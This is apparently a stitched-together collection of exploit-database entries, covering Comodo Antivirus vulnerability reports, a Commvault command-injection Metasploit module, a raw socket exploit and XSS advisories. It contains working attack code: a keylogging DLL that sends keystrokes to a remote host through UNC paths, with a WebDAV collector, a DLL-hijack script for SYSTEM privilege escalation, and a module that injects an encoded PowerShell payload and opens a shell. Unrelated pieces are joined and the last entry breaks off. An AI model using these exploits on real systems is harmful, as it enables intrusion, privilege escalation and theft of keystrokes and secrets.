LegalCopyright: 2005-2014 COMODO. All rights reserved.
Please note that many of the CAV modules used by Comodo do not use dynamic base, so ASLR does not work. Naturally, all files are scanned with NT AUTHORITY\SYSTEM and with no sandboxing.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39606.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=769
Comodo Antivirus includes a x86 emulator that is used to unpack and monitor obfuscated executables, this is common practice among antivirus products. The idea is that emulators can run the code safely for a short time, giving the sample enough time to unpack itself or do something that can be profiled. Needless to say, this is a very significant and complicated attack surface, as an attacker can trigger emulation simply by sending the victim an email or getting them to visit a website with zero user interaction.
I've found some memory corruption issues with the emulator, but Comodo also implement hundreds of shims for Win32 API calls, so that things like CreateFile, LoadLibrary, and so on appear to work to the emulated code. Astonishingly, some of these shims simply extract the parameters from the emulated address space and pass them directly to the real API, while running as NT AUTHORITY\SYSTEM. The results are then poked back in to the emulator, and the code continues.
The possible attacks here are too numerous to mention.
Here are some of the more obvious mistakes, let's start with USER32!GetKeyState (wtf!!!!). Here is the emulator shim from mach32.dll:
.text:1001D9A0 sub_1001D9A0 proc near ; DATA XREF: .data:1016B10C31o
.text:1001D9A0
.text:1001D9A0 arg_0 = dword ptr 8
.text:1001D9A0
.text:1001D9A0 55 push ebp
.text:1001D9A1 8B EC mov ebp, esp
.text:1001D9A3 8B 45 08 mov eax, [ebp+arg_0] ; pVMClass
.text:1001D9A6 8B 08 mov ecx, [eax] ; vtbl
.text:1001D9A8 8B 91 98 00 00+ mov edx, [ecx+98h] ; VArg2Rarg
.text:1001D9AE 6A 00 push 0
.text:1001D9B0 6A 06 push 6 ; TypeDword
.text:1001D9B2 6A 01 push 1 ; ParamNum
.text:1001D9B4 50 push eax ; this
.text:1001D9B5 FF D2 call edx ; VArg2Rarg(pVMClass, 1, TypeDword, 0); Virtual Arg to Real Arg
.text:1001D9B7 50 push eax ; nVirtKey
.text:1001D9B8 FF 15 F4 62 07+ call ds:GetKeyState ; Extract parameter from emulator, then return the real value (!!!)
.text:1001D9BE 98 cwde
.text:1001D9BF 5D pop ebp
.text:1001D9C0 C3 retn
.text:1001D9C0 sub_1001D9A0 endp
The emulated code can query the real keyboard state (!!!).
I've found that the simplest method of triggering the emulation is to create a DLL with a writable text section. An attacker would also need a way to exfiltrate the monitored keystrokes out of the emulator, but I've found that the shim for kernel32!SetCurrentDirectoryA actually calls GetFileAttributes() on the specified parameter, so you can encode it as a UNC path and send it over the network to your control server. This doesn't require any user interaction.
To reproduce this bug, first, create a DLL like this:
#include <windows.h>
#include <stdio.h>
#include <string.h>   /* strcpy, strlen */
#pragma comment(lib, "KERNEL32")
#pragma comment(lib, "USER32")
// This is required to trigger the generic unpacker in comodo.
#pragma comment(linker, "/SECTION:.text,ERW")
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
char path[128];
char *ptr;
ZeroMemory(path, sizeof path);
ptr = strcpy(path, "\\\\?\\UNC\\192.168.237.1\\");
ptr += strlen(ptr);
SetCurrentDirectory(path);
for (;;) {
for (*ptr = 'A'; *ptr <= 'Z'; (*ptr)++) {
if (GetKeyState(*ptr) & 0x8000) {
SetCurrentDirectory(path);
}
}
}
return TRUE;
}
Then run a minimal WebDAV server like this on the remote host:
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer

class WebDavHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header('Allow', 'OPTIONS, GET, PROPFIND')
        self.send_header('DAV', '1, 2')
        self.end_headers()
        self.connection.shutdown(1)

    def do_PROPFIND(self):
        self.send_response(207)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()
        self.wfile.write('<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response></a:response></a:multistatus>')
        self.connection.shutdown(1)

SocketServer.TCPServer(('0.0.0.0', 80), WebDavHandler).serve_forever()
You only get a few seconds of logging per scan, but you can duplicate the payload thousands of times into a ZIP archive for effectively unlimited scan time. Something like this:
$ for ((i=0;i<1024;i++)); do cp keystroke.dll $i.dll; zip keystroke.zip $i.dll; rm -f $i.dll; done
Now scanning that zip file will send all keystrokes to the WebDAV server for approximately ten or so minutes (please note, there's no reason this can't be extended indefinitely), see screenshot for reference.
This is not the only attack possible: you can also extract, delete, query and use cryptographic keys, smartcards and other security hardware, because calls to CAPI routines such as the following are all passed directly through to the real API:
ADVAPI32!CryptAcquireContextA
ADVAPI32!CryptDecrypt
ADVAPI32!CryptDeriveKey
ADVAPI32!CryptCreateHash .. and so on.
Any secrets stored in the registry are also exposed to attackers via RegQueryValueEx and GetProfileInt among others, all passed directly through to the real API. The list of possible attacks here is simply too long to enumerate, any competent developer can see this is a colossal mistake that needs to be remedied urgently.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39599.zip
<#
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy folder with SYSTEM
level privileges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
hardcoded DLL loading procedures that look for SHFOLDER.DLL in the directory it is executed from.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
looking in the directories listed in the PATH variable.
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
Param
(
[Parameter(ValueFromPipelineByPropertyName = $true)]
[string]$DLL = ""
)
if (!(Test-Path $DLL))
{
throw "Fatal Error: The specified file: $DLL does not exist."
}
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=764
Packman is an obscure opensource executable packer that Comodo Antivirus attempts to unpack during scanning. The code is available online here:
http://packmanpacker.sourceforge.net/
If the compression method is set to algorithm 1, compression parameters are read directly from the input executable without validation. Fuzzing this unpacker revealed a variety of crashes due to this, such as causing pointer arithmetic in CAEPACKManUnpack::DoUnpack_With_NormalPack to move pksDeCodeBuffer.ptr to an arbitrary address, which allows an attacker to free() an arbitrary pointer.
This issue is obviously exploitable to execute code as NT AUTHORITY\SYSTEM.
The attached testcase will attempt to free() an invalid pointer to demonstrate this.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39601.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=763
The LZMA specification says the following about the memory usage of decompression:
"The size of the probability model counter arrays is calculated with the following formula: size_of_prob_arrays = 1846 + 768 * (1 << (lp + lc))"
But that formula only holds true if you keep the parameters within the specified range, which the SDK gives as:
lp - The number of literal pos bits (low bits of current position for literals).
It can be in the range from 0 to 4. The default value is 0.
lc - The number of literal context bits (high bits of previous literal).
It can be in the range from 0 to 8. The default value is 3.
If you set the parameters outside those ranges, then the rest of the assumptions don't hold and memory corruption can occur. Comodo does not attempt to keep these parameters in range, so lots of memory corruption can occur; the attached testcase should crash during an LZMA decode operation by overflowing a heap buffer.
This vulnerability is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM.
(438.dd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
unpack!CreateInstance+0x654bc:
000007fe`f29890cc 66f3ab rep stos word ptr [rdi]
0:010> r
rax=0000000000000400 rbx=0000000000000000 rcx=000000007ffffe88
rdx=0000000000000001 rsi=000000000b154588 rdi=000000000bbfc000
rip=000007fef29890cc rsp=000000000d6cd2c0 rbp=0000000000000000
r8=0000000000023c7c r9=000000000d6cd378 r10=0000000000000001
r11=000000000b361000 r12=0000000000000001 r13=000000000b39c38c
r14=0000000000000000 r15=000000000bbfaea4
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
unpack!CreateInstance+0x654bc:
000007fe`f29890cc 66f3ab rep stos word ptr [rdi]
This is trying to initialize the probabilities array, but overflowing the heap buffer allocated and running off a page boundary.
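The range check the report says is missing, as an added example in C (not Comodo's code and not the LZMA SDK's): it computes the quoted size formula both unchecked and with lc/lp validated, and decodes the LZMA properties byte, whose (pb * 5 + lp) * 9 + lc packing is the standard LZMA header format rather than anything the report shows. The constants 1846 and 768 and the ranges lc 0..8 and lp 0..4 are the ones quoted above; pb 0..4 is the SDK's range for the third parameter.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* SDK ranges quoted in the report: lc 0..8, lp 0..4; pb is 0..4 in the same SDK. */
#define LZMA_LC_MAX 8u
#define LZMA_LP_MAX 4u
#define LZMA_PB_MAX 4u

typedef struct {
    unsigned lc;   /* literal context bits */
    unsigned lp;   /* literal position bits */
    unsigned pb;   /* position bits (not part of the size formula) */
} lzma_props;

/* The spec formula, computed in 32 bits with no range check, as the report
 * describes Comodo doing.  Caller must keep lc + lp below 32 (a larger shift is
 * undefined in C); nothing else limits the result. */
uint32_t lzma_prob_array_size_unchecked(unsigned lc, unsigned lp)
{
    return 1846u + 768u * (1u << (lp + lc));
}

/* Hardened variant: validate lc and lp first; false means reject the stream. */
bool lzma_prob_array_size_checked(unsigned lc, unsigned lp, uint32_t *size)
{
    if (lc > LZMA_LC_MAX || lp > LZMA_LP_MAX)
        return false;
    *size = lzma_prob_array_size_unchecked(lc, lp);  /* lc + lp <= 12: cannot wrap */
    return true;
}

/* LZMA stores all three parameters in one header byte: (pb * 5 + lp) * 9 + lc.
 * Decode it and reject anything an in-range encoder could not have produced. */
bool lzma_decode_props(uint8_t props_byte, lzma_props *out)
{
    unsigned d = props_byte;
    /* Largest in-range encoding is (4 * 5 + 4) * 9 + 8 = 224. */
    if (d > (LZMA_PB_MAX * 5u + LZMA_LP_MAX) * 9u + LZMA_LC_MAX)
        return false;
    out->lc = d % 9u;
    d /= 9u;
    out->lp = d % 5u;
    out->pb = d / 5u;
    return true;
}

int main(void)
{
    uint32_t size;
    lzma_props p;

    /* Constructed header byte: 0x5d is the common default (lc=3, lp=0, pb=2). */
    if (lzma_decode_props(0x5d, &p) && lzma_prob_array_size_checked(p.lc, p.lp, &size))
        printf("lc=%u lp=%u pb=%u -> %u probability entries\n",
               p.lc, p.lp, p.pb, (unsigned)size);

    /* Out-of-range lc=20, lp=4: 768 << 24 is a multiple of 2^32, so the 32-bit
     * formula wraps to the bare 1846 while the decoder still expects 768 << 24
     * literal entries.  The checked version refuses it. */
    printf("unchecked(lc=20, lp=4) = %u\n",
           (unsigned)lzma_prob_array_size_unchecked(20, 4));
    printf("checked(lc=20, lp=4) accepted? %s\n",
           lzma_prob_array_size_checked(20, 4, &size) ? "yes" : "no");
    return 0;
}
```

For lc = 20, lp = 4 the literal term 768 << 24 is a multiple of 2^32, so the 32-bit formula yields exactly the base 1846 entries while the initialisation loop still walks 768 << 24 of them; that is the kind of mismatch that drives a rep stos off the end of the allocation. Validating the two parameters before doing any arithmetic is the whole fix.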
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39602.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=762
In COleMemFile::LoadDiFatList, values from the header are used to parse the document FAT. If header.csectDif is very high, the calculation overflows and a very small buffer is allocated.
The document FAT is then memcpy'd onto the buffer directly from the input file being scanned, resulting in a nice clean heap overflow.
This vulnerability is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM; the attached test cases should reproduce the problem reliably (this issue was found using trivial fuzzing). You can see this testcase has this->m_oleDocHeader.csectDif = 0x40000001, so this->m_oleDocHeader.csectDif * this->diFATPerSect * 4 + 436 wraps to 0x3b0.
(b80.ad8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
script!CreateInstance+0x178ac:
00000000`0ac5a4bc 8901 mov dword ptr [rcx],eax ds:00000000`0c79a1f0=????????
0:009> u
script!CreateInstance+0x178ac:
00000000`0ac5a4bc 8901 mov dword ptr [rcx],eax
00000000`0ac5a4be 4d8bc8 mov r9,r8
00000000`0ac5a4c1 49c1e905 shr r9,5
00000000`0ac5a4c5 7550 jne script!CreateInstance+0x17907 (00000000`0ac5a517)
00000000`0ac5a4c7 4d8bc8 mov r9,r8
00000000`0ac5a4ca 49c1e903 shr r9,3
00000000`0ac5a4ce 7414 je script!CreateInstance+0x178d4 (00000000`0ac5a4e4)
00000000`0ac5a4d0 4883e908 sub rcx,8
0:009> r
rax=00000000004e8400 rbx=000000000c782120 rcx=000000000c79a1f0
rdx=fffffffffffe99f8 rsi=000000000c7839f0 rdi=0000000000000017
rip=000000000ac5a4bc rsp=000000000d80e4b8 rbp=0000000000000bd6
r8=00000000000001f8 r9=0000000000000000 r10=00000006ffffffff
r11=000000000c799ff8 r12=00000000000138a1 r13=000000000aea0000
r14=0000000000000000 r15=0000000000336b00
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
script!CreateInstance+0x178ac:
00000000`0ac5a4bc 8901 mov dword ptr [rcx],eax ds:00000000`0c79a1f0=????????
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39603.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=738
A major component of Comodo Antivirus is the x86 emulator, which includes a number of shims for win32 API routines so that common API calls work in emulated programs (CreateFile, LoadLibrary, etc). The emulator itself is located in MACH32.DLL, which is compiled without /DYNAMICBASE, and runs as NT AUTHORITY\SYSTEM.
These API routines access memory from the emulated virtual machine, perform the requested operation, and then poke the result back into the emulator. Because these emulated routines are all native code, they must take care not to trust values extracted from the emulator, which is running attacker controlled code.
Browsing through the list of emulated routines, MSVBVM60!rtcLowerCaseVar jumped out as an obvious case of integer overflow due to trusting attacker-provided parameters.
The code attempts to extract a VT_BSTR VARIANT, which contains a pascal-like string, something like:
struct BSTR {
DWORD Length;
CHAR Data[0];
};
In pseudocode, the code does something like this:
vm->ReadMemory(Parameter1); // PVARIANT
vm->ReadMemory(Parameter2); // PVARIANT
vm->GetData(&LocalVariant, Parameter2); // Read the second VARIANT
if (LocalVariant.vt != VT_BSTR) // Verify it's a BSTR
return false;
vm->GetData(&szLen, LocalVariant.bstr - 4); // Try to read the Length of the BSTR
The code attempts to convert this BSTR into a nul-terminated wide string. This requires 2 additional bytes (for the terminator), so providing a length of 0xFFFFFFFF will cause the allocation to wrap.
Buf = malloc(szLen + 2); // Allocate space for the string
vm->GetWideString(Buf, Ptr, szLen >> 1); // Read Length/2 WCHARs
This will read Length/2 WCHARs from the hostile virtual machine and clobber the trusted heap buffer. The corruption can be halted early by placing the BSTR before an unmapped page boundary, resulting in a nice clean heap overflow.
The scan process runs as NT AUTHORITY\SYSTEM and does not use ASLR, making this a critical remote memory corruption that can be exploited via email, HTTP, etc. with zero user interaction.
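Both allocation-size computations above, COleMemFile::LoadDiFatList (issue 762) and the BSTR conversion in the emulated rtcLowerCaseVar shim (issue 738), reduce to the same defect, an unchecked 32-bit size calculation, so here is one added example in C (not Comodo's code) that reproduces each calculation as described and places an overflow-checked version beside it. It assumes diFATPerSect = 127, the standard count for 512-byte sectors, which is also the value that makes 0x40000001 wrap to the 0x3b0 quoted in the report; the max_len cap on the BSTR side is a policy parameter of this example, not something the report describes.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption: 127 DIFAT entries per 512-byte sector (128 DWORDs minus the
 * next-sector pointer).  The report does not print diFATPerSect, but 127 is the
 * value that makes csectDif = 0x40000001 wrap to the 0x3b0 it quotes. */
#define DIFAT_PER_SECT_512 127u
/* The "+ 436" from the report: the 109 DIFAT entries in the header, 4 bytes each. */
#define DIFAT_HEADER_BYTES 436u

/* COleMemFile::LoadDiFatList as described: csectDif * diFATPerSect * 4 + 436 in 32 bits. */
uint32_t difat_bytes_unchecked(uint32_t csectDif, uint32_t diFATPerSect)
{
    return csectDif * diFATPerSect * 4u + DIFAT_HEADER_BYTES;
}

/* Hardened version: do the product in 64 bits and refuse anything that would not
 * fit once multiplied by 4 and added to the header part.  A real parser would also
 * cap csectDif by the number of sectors the file actually contains. */
bool difat_bytes_checked(uint32_t csectDif, uint32_t diFATPerSect, uint32_t *bytes)
{
    uint64_t entries = (uint64_t)csectDif * diFATPerSect;
    if (entries > (UINT32_MAX - DIFAT_HEADER_BYTES) / 4u)
        return false;
    *bytes = (uint32_t)entries * 4u + DIFAT_HEADER_BYTES;
    return true;
}

/* MSVBVM60!rtcLowerCaseVar shim as described: room for the BSTR bytes plus a
 * two-byte terminator, computed in 32 bits. */
uint32_t bstr_alloc_unchecked(uint32_t szLen)
{
    return szLen + 2u;
}

/* Hardened version: the emulated program chose szLen, so treat it as hostile.
 * max_len is the caller's policy cap (for a sandbox, at most the size of the
 * emulated address space the bytes would be read from). */
bool bstr_alloc_checked(uint32_t szLen, uint32_t max_len, uint32_t *bytes)
{
    if (szLen > max_len || szLen > UINT32_MAX - 2u)
        return false;
    *bytes = szLen + 2u;
    return true;
}

int main(void)
{
    uint32_t n;
    printf("DIFAT bytes, csectDif=0x40000001 unchecked: 0x%x\n",
           (unsigned)difat_bytes_unchecked(0x40000001u, DIFAT_PER_SECT_512));
    printf("DIFAT bytes, csectDif=0x40000001 checked:   %s\n",
           difat_bytes_checked(0x40000001u, DIFAT_PER_SECT_512, &n) ? "accepted" : "rejected");
    printf("BSTR alloc, szLen=0xFFFFFFFF unchecked: %u\n",
           (unsigned)bstr_alloc_unchecked(0xFFFFFFFFu));
    printf("BSTR alloc, szLen=0xFFFFFFFF checked:   %s\n",
           bstr_alloc_checked(0xFFFFFFFFu, 1u << 20, &n) ? "accepted" : "rejected");
    return 0;
}
```

Note that the wrapped value 0x3b0 is exactly the size a legitimate header with csectDif = 1 would need, so the undersized buffer looks perfectly ordinary to the allocator; only arithmetic that is checked before allocation, or done in a wider type and compared against the 32-bit maximum, catches it.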
(e38.2c0): Access violation - code c0000005 (!!! second chance !!!)
00000000`0ec6b5c6 0fb70408 movzx eax,word ptr [rax+rcx] ds:00000000`4e6d1567=????
0:009> r
rax=000000004e6d0002 rbx=0000000000000100 rcx=0000000000001565
rdx=000000005b0ce400 rsi=00000000000000c3 rdi=000000005b0ce510
rip=000000000ec6b5c6 rsp=000000005b0ce3f0 rbp=0000000000006e58
r8=000000005b0ce460 r9=000000004e6d0005 r10=00000000000000e8
r11=00000000000000e8 r12=00000000000000f7 r13=000000004e6bfe1c
r14=0000000000014b08 r15=0000000000000100
iopl=0 nv up ei pl nz ac pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010210
00000000`0ec6b5c6 0fb70408 movzx eax,word ptr [rax+rcx] ds:00000000`4e6d1567=????
0:009> lmv mmach32
start end module name
00000000`17410000 00000000`17658000 mach32 (deferred)
Image path: C:\Program Files\COMODO\COMODO Internet Security\scanners\mach32.dll
Image name: mach32.dll
Timestamp: Mon Dec 29 04:57:44 2014 (54A14FC8)
CheckSum: 00244AF0
ImageSize: 00248000
File version: 6.2.15068.1057
Product version: 6.2.15068.1057
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04e4
CompanyName: COMODO
ProductName: COMODO Antivirus Scan Engine
ProductVersion: 6, 2, 342748, 1057
FileVersion: 6, 2, 342748, 1057
FileDescription: COMODO Antivirus Scan Engine
LegalCopyright: 2005-2014 COMODO. All rights reserved.
I think the same bug exists in rtcSpaceBstr, rtcSpaceVar, rtcUpperCaseBstr, rtcUpperCaseVar, and maybe a few more.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39605.zip
import socket
import binascii
import time
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect(("10.101.0.85", 8400))
def sr(p=None, r=None):
if p:
print "sending %d bytes: %s " % (len(p)/2,p)
payl = binascii.a2b_hex(p)
s.send(payl)
if r:
data = s.recv(1024*2)
print "received %d bytes: %s " % (len(data),binascii.b2a_hex(data))
pkt1 = "0000003800000010000000100000000f00000000000000000000000000000000000000000000000000000000000000010000000000000000"
pkt1 += "0000100309000101090000000000ffe80000000800010000"
pkt1 += "0000000400000004"
pkt2 = "0000100309000509000000090000ffe800000036"+"00018016"
pkt2 += "02000000"+"09050009"+"c14d4d0"+"000000000000000003a793102076376642e6578656a231a0200429d750500989796059c16e042"+"fd00b417"
pkt3 = "53534c634c6e54"+"01"+"000b"+"77696e323031322d303200"+"03"+"0000000300000001"
p = "41"*0xd0
pkt3 += p
sr(pkt1,1)
sr(pkt2,1)
sr(pkt3,1)
exit()
s.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Commvault Communications Service (cvd) Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
and v10). The vulnerability exists in the cvd.exe service and allows an
attacker to execute arbitrary commands in the context of the service. By
default, the Commvault Communications service installs and runs as SYSTEM in
Windows and does not require authentication. This vulnerability was discovered
in the Windows version. The Linux version wasn't tested.
},
'License' => MSF_LICENSE,
'Author' =>
[
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
],
'References' =>
[
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
{
'Arch' => [ARCH_X64, ARCH_X86]
}
],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 2017'))
register_options([Opt::RPORT(8400)])
end
def exploit
buf = build_exploit
print_status("Connecting to Commvault Communications Service.")
connect
print_status("Executing payload")
#Send the payload
sock.put(buf)
#Handle the shell
handler
disconnect
end
def build_exploit
#Get encoded powershell of payload
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
#Remove additional cmd.exe call
psh = "powershell"
idx = command.index(psh)
command = command[(idx)..-1]
#Build packet
cmd_path = 'C:\Windows\System32\cmd.exe'
msg_type = 9
zero = 0
payload = ""
payload += make_nops(8)
payload += [msg_type].pack('I>')
payload += make_nops(328)
payload += cmd_path
payload += ";"
payload += ' /c "'
payload += command
payload += '" && echo '
payload += "\x00"
payload += [zero].pack('I>')
#Add length header and payload
ret_data = [payload.length].pack('I>')
ret_data += payload
ret_data
end
end
source: https://www.securityfocus.com/bid/49022/info
Community Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Community Server 2007 and 2008 are vulnerable; other versions may also be affected.
http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS]
# Exploit Title: CommuniGatePro webmails Multiple Stored XSS
# Date: 15/11/2017
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.stalker.com/
# Software Link: http://www.stalker.com/ (paid product)
# Version: 6.1.16<
# Tested on: production server on crystal, pronto and pronto4 webmails from gmail and hotmail.
CommuniGatePro 6.1.16 webmails (crystal, pronto and pronto4) suffer from multiple stored XSS vulnerabilities. The details below illustrate the impact of this vulnerability.
Vulnerability Description:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Vulnerability details (Stored XSS):
This vulnerability allowed us to gain access to the following:
Control the victim's mailbox by just reading my email
Control the victim's computer in case the person uses Internet Explorer 8 which is widely used in our company.
Send emails on behalf of the victim
Deface the whole victim mailbox
Invoke the malicious piece of code each time an attachment is sent to the victim.
Vulnerable sections:
Calendar
Files
Tasks
Notes
Inbox
Attack Narratives and Scenarios:
1. Calendar:
Source webmail: tested with gmail and hotmail
Destination webmail: Crystal
In order to deliver our PoC, we have taken advantage of Google Calendar to achieve our goal.
PoC:
POST /calendar/event HTTP/1.1
Host: calendar.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://calendar.google.com/calendar/render?tab=mc
X-If-No-Redirect: 1
X-Is-Xhr-Request: 1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 634
Cookie: Mycookie
Connection: close
